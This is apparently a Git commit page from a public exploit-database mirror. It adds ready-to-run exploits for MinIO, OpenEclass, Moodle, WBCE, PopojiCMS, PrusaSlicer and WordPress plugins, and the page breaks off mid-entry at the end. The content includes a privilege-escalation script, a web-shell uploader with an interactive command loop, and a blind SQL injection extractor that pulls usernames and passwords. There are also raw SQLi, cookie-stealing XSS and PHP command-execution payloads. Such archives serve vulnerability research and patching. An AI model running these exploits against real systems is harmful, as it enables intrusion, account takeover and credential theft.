bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-04-13

Browse source 
15 changes to exploits/shellcodes/ghdb

MinIO < 2024-01-31T20-20-33Z - Privilege Escalation

PrusaSlicer 2.6.1 - Arbitrary code execution

GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload

HTMLy Version v2.9.6 - Stored XSS

Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter

PopojiCMS Version 2.0.1 - Remote Command Execution

Quick CMS v6.7 en 2023 - 'password' SQLi

Service Provider Management System v1.0 - SQL Injection

WBCE 1.6.0 - Unauthenticated SQL injection

WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)

Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)

Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)

Ray OS v2.6.3 - Command Injection RCE(Unauthorized)

Terratec dmx_6fire USB - Unquoted Service Path
This commit is contained in:
Exploit-DB 2024-04-13 00:16:27 +00:00
parent 034fafa3fd
commit aa67db6cea
14 changed files with 844 additions and 41 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

200
exploits/go/remote/51976.txt Normal file
View file

@ -0,0 +1,200 @@
# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation
# Date: 2024-04-11
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z
# Tested on: Windows 10
# CVE : CVE-2024-24747
# Required before execution: pip install minio,requests
import argparse
import datetime
import traceback
import urllib
from xml.dom.minidom import parseString
import requests
import json
import base64
from minio.credentials import Credentials
from minio.signer import sign_v4_s3
class CVE_2024_24747:
new_buckets = []
old_buckets = []
def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):
self.bucket_names = ['pocpublic', 'pocprivate']
self.new_accesskey = 'miniocvepoc'
self.new_secretkey = 'MINIOcvePOC'
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
'Content-Type': 'application/json',
'Accept': '*/*'
}
self.accesskey = accesskey
self.secretkey = secretkey
self.verify = verify
if verify:
self.url = "https://" + host + ":" + port
self.console_url = "https://" + host + ":" + console_port
else:
self.url = "http://" + host + ":" + port
self.console_url = "http://" + host + ":" + console_port
self.credits = Credentials(
access_key=self.new_accesskey,
secret_key=self.new_secretkey
)
self.login()
try:
self.create_buckets()
self.create_accesskey()
self.old_buckets = self.console_ls()
self.console_exp()
self.new_buckets = self.console_ls()
except:
traceback.print_stack()
finally:
self.delete_accesskey()
self.delete_buckets()
if len(self.new_buckets) > len(self.old_buckets):
print("There is CVE-2024-24747 problem with the minio!")
print("Before the exploit, the buckets are : " + str(self.old_buckets))
print("After the exploit, the buckets are : " + str(self.new_buckets))
else:
print("There is no CVE-2024-24747 problem with the minio!")
def login(self):
url = self.url + "/api/v1/login"
payload = json.dumps({
"accessKey": self.accesskey,
"secretKey": self.secretkey
})
self.session = requests.session()
if self.verify:
self.session.verify = False
status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
# print(status_code)
if status_code == 204:
status_code = 0
else:
print('Login failed! Please check if the input accesskey and secretkey are correct!')
exit(1)
def create_buckets(self):
url = self.url + "/api/v1/buckets"
for name in self.bucket_names:
payload = json.dumps({
"name": name,
"versioning": False,
"locking": False
})
status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
# print(status_code)
if status_code == 200:
status_code = 0
else:
print("新建 (New)"+name+" bucket 失败 (fail)")
def delete_buckets(self):
for name in self.bucket_names:
url = self.url + "/api/v1/buckets/" + name
status_code = self.session.request("DELETE", url, headers=self.headers).status_code
# print(status_code)
if status_code == 204:
status_code = 0
else:
print("删除 (delete)"+name+" bucket 失败 (fail)")
def create_accesskey(self):
url = self.url + "/api/v1/service-account-credentials"
payload = json.dumps({
"policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}",
"accessKey": self.new_accesskey,
"secretKey": self.new_secretkey
})
status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code
# print(status_code)
if status_code == 201:
# print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)")
# print(self.new_secretkey)
status_code = 0
else:
print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)")
def delete_accesskey(self):
url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')
status_code = self.session.request("DELETE", url, headers=self.headers).status_code
# print(status_code)
if status_code == 204:
# print("删除" + self.new_accesskey + " accessKey成功")
status_code = 0
else:
print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)")
def headers_gen(self,url,sha256,method):
datetimes = datetime.datetime.utcnow()
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
urls = urllib.parse.urlparse(url)
headers = {
'X-Amz-Content-Sha256': sha256,
'X-Amz-Date': datetime_str,
'Host': urls.netloc,
}
headers = sign_v4_s3(
method=method,
url=urls,
region='us-east-1',
headers=headers,
credentials=self.credits,
content_sha256=sha256,
date=datetimes,
)
return headers
def console_ls(self):
url = self.console_url + "/"
sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
headers = self.headers_gen(url,sha256,'GET')
if self.verify:
response = requests.get(url,headers=headers,verify=False)
else:
response = requests.get(url, headers=headers)
DOMTree = parseString(response.text)
collection = DOMTree.documentElement
buckets = collection.getElementsByTagName("Bucket")
bucket_names = []
for bucket in buckets:
bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)
# print('当前可查看的bucket有:\n' + str(bucket_names))
return bucket_names
def console_exp(self):
url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey
sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"
headers = self.headers_gen(url, sha256, 'POST')
hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"
content = bytes.fromhex(hex_string)
if self.verify:
response = requests.post(url,headers=headers,data=content,verify=False)
else:
response = requests.post(url,headers=headers,data=content)
status_code = response.status_code
if status_code == 204:
# print("提升" + self.new_accesskey + " 权限成功!")
status_code = 0
else:
print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)")
if __name__ == '__main__':
logo = """
____ ___ ____ _ _ ____ _ _ _____ _ _ _____
___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ |
/ __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / /
| (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / /
\___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/
"""
print(logo)
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")
parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")
parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")
args = parser.parse_args()
CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

32
exploits/multiple/local/51983.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268
==========================================================================================
1.) 3mf Metadata extension
==========================================================================================
PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.
==========================================================================================
2.) PoC
==========================================================================================
For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:
```
; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"
```
Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.
For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:
```
; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "
```

39
exploits/php/webapps/51967.txt
View file

@ -1,39 +0,0 @@
# Title: Quick CMS v6.7 en 2023 - 'password' SQLi
# Author: nu11secur1ty
# Date: 03/19/2024
# Vendor: https://opensolution.org/
# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Reference: https://portswigger.net/web-security/sql-injection
# Description: The password parameter is vulnerable for SQLi bypass authentication!
[+]Payload:
```mysql
POST /admin.php?p=login HTTP/1.1
Host: localpwnedhost.com
Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg
Content-Length: 92
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localpwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localpwnedhost.com/admin.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true
```

140
exploits/php/webapps/51975.txt Normal file
View file

@ -0,0 +1,140 @@
# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload
# Date: 2024-02-04
# Exploit Author: Georgios Tsimpidas
# Vendor Homepage: https://www.openeclass.org/
# Software Link: https://download.openeclass.org/files/3.15/
# Version: 3.15 (2024)
# Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1)
# CVE : CVE-2024-31777
# GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File
import requests
import argparse
import zipfile
import os
import sys
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'
MALICIOUS_PAYLOAD = """\
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
die;
}
?>
"""
def banner():
print(f'''{RED}
{YELLOW}
============================ Author: Frey ============================
{RESET}''')
def execute_command(openeclass, filename):
while True:
# Prompt for user input with "eclass"
cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")
# Check if the command is 'quit', then break the loop
if cmd.lower() == "quit":
print(f"{ORANGE}\nExiting...{RESET}")
clean_server(openeclass)
sys.exit()
# Construct the URL with the user-provided command
url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"
# Execute the GET request
try:
response = requests.get(url)
# Check if the request was successful
if response.status_code == 200:
# Print the response text
print(f"{GREEN}{response.text}{RESET}")
except requests.exceptions.RequestException as e:
# Print any error that occurs during the request
print(f"{RED}An error occurred: {e}{RESET}")
def upload_web_shell(openeclass, username, password):
login_url = f'{openeclass}/?login_page=1'
login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'
# Login credentials
payload = {
'next': '/main/portfolio.php',
'uname': f'{username}',
'pass': f'{password}',
'submit': 'Enter'
}
headers = {
'Referer': login_page_url,
}
# Use a session to ensure cookies are handled correctly
with requests.Session() as session:
# (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens
session.get(login_page_url)
# Post the login credentials
response = session.post(login_url, headers=headers, data=payload)
# Create a zip file containing the malicious payload
zip_file_path = 'malicious_payload.zip'
with zipfile.ZipFile(zip_file_path, 'w') as zipf:
zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())
# Upload the zip file
url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'
files = {
'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),
'certhtmlfile': (None, ''),
'orientation': (None, 'L'),
'description': (None, ''),
'cert_id': (None, ''),
'submit_cert_template': (None, '')
}
response = session.post(url, files=files)
# Clean up the zip file
os.remove(zip_file_path)
# Check if the upload was successful
if response.status_code == 200:
print(f"{GREEN}Payload uploaded successfully!{RESET}")
return True
else:
print(f"{RED}Failed to upload payload. Exiting...{RESET}")
return False
def clean_server(openeclass):
print(f"{ORANGE}Cleaning server...{RESET}")
# Remove the uploaded files
requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")
requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")
print(f"{GREEN}Server cleaned successfully!{RESET}")
def main():
parser = argparse.ArgumentParser(description="Open eClass CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")
parser.add_argument('-u', '--username', required=True, help="Username for login")
parser.add_argument('-p', '--password', required=True, help="Password for login")
parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
args = parser.parse_args()
banner()
# Running the main login and execute command function
if upload_web_shell(args.eclass, args.username, args.password):
execute_command(args.eclass, 'evil.php')
if __name__ == "__main__":
main()

9
exploits/php/webapps/51979.txt Normal file
View file

@ -0,0 +1,9 @@
# Exploit Title: HTMLy Version v2.9.6 - Stored XSS
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.htmly.com/
# Version 3.10.8.21
# Date : 04/08/2024
1 ) Login admin https://127.0.0.1/HTMLy/admin/config
2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)>
3 ) After save it you will be see XSS alert

36
exploits/php/webapps/51981.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)
# Date: 22 March 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.32
# Proof Of Concept:
1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".
# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns
# Vulnerable Properties name: name, playlist_id
# Payload: "><script>alert(document.cookie)</script>
# Request:
POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2
Host: erdemstar.local
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
Content-Length: 178
Cache-Control: max-age=0
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

40
exploits/php/webapps/51982.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution
# Date: 27/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS
##POC:
1 ) Login with admin cred and click settings
2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>
3 ) Open main page , you will be see id command result
POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1
Host: demos5.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E
Result:
uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

75
exploits/php/webapps/51984.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
# Google Dork:
# Date: 04/11/2023
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
# Vendor Homepage: https://moodle.org/
# Software Link:
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2021-36393
import requests
import string
from termcolor import colored
# Request details
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
HEADERS = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
"Origin": "http://127.0.0.1:8080",
"Referer": "http://127.0.0.1:8080/moodle/my/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
"Connection": "close"
}
# Characters to test
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"
def test_character(payload):
response = requests.post(URL, headers=HEADERS, json=[payload])
return response.elapsed.total_seconds() >= 3
def extract_value(column, label):
base_payload = {
"index": 0,
"methodname": "core_course_get_enrolled_courses_by_timeline_classification",
"args": {
"offset": 0,
"limit": 0,
"classification": "all",
"sort": "",
"customfieldname": "",
"customfieldvalue": ""
}
}
result = ""
for _ in range(50): # Assumes a maximum of 50 characters for the value
character_found = False
for character in characters_to_test:
if column == "database()":
base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
else:
base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"
if test_character(base_payload):
result += character
print(colored(f"{label}: {result}", 'red'), end="\r")
character_found = True
break
if not character_found:
break
# Print the final result
print(colored(f"{label}: {result}", 'red'))
if __name__ == "__main__":
extract_value("database()", "Database")
extract_value("username", "Username")
extract_value("password", "Password")

56
exploits/php/webapps/51985.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023
# Exploit Author: young pope
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip
# Version: 1.6.0
# Tested on: Kali linux
# CVE : CVE-2023-39796
There is an sql injection vulnerability in *miniform* module which is a
default module installed in the *WBCE* cms. It is an unauthenticated
sqli so anyone could access it and takeover the whole database.
In file /modules/miniform/ajax_delete_message.php there is no
authentication check. On line |40| in this file, there is a |DELETE|
query that is vulnerable, an attacker could jump from the query using
tick sign - ```.
Function |addslashes()|
(https://www.php.net/manual/en/function.addslashes.php) escapes only
these characters and not a tick sign:
* single quote (')
* double quote (")
* backslash ()
* NUL (the NUL byte
The DB_RECORD_TABLE parameter is vulnerable.
If an unauthenticated attacker send this request:
```
POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 162
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record
```
The response is received after 6s.
Reference links:
* https://nvd.nist.gov/vuln/detail/CVE-2023-39796
* https://forum.wbce.org/viewtopic.php?pid=42046#p42046
* https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
* https://pastebin.com/PBw5AvGp

75
exploits/php/webapps/51986.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution
# Date: 30/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
# Version: 1.6.1
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS
## POC:
1 ) Login with admin cred and click Add-ons
2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php
4 ) You will be see id command result
Result:
uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)
### Post Request:
POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1
Host: demos6.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459
Content-Length: 522
Origin: https://demos6.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="formtoken"
5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"
Content-Type: application/x-php
<?php echo system('id'); ?>
-----------------------------86020911415982314764024459
Content-Disposition: form-data; name="submit"
-----------------------------86020911415982314764024459--
### Response :
<!-- ################### Up from here: Original Code from original template ########### -->
<!-- senseless positioning-table: needed for old modules which base on class td.content -->
<div class="row" style="overflow:visible">
<div class="fg12">
<table id="former_positioning_table">
<tr>
<td class="content">
uid=1000(soft) gid=1000(soft) groups=1000(soft)
uid=1000(soft) gid=1000(soft) groups=1000(soft)
<div class="top alertbox_error fg12 error-box">
<i class=" fa fa-2x fa-warning signal"></i>
<p>Invalid WBCE CMS language file. Please check the text file.</p>
<p><a href="index.php" class="button">Back

36
exploits/php/webapps/51987.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 12 April 2024
# Exploit Author: Erdemstar
# Vendor: https://wordpress.com/
# Version: 1.1.1
# Proof Of Concept:
1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".
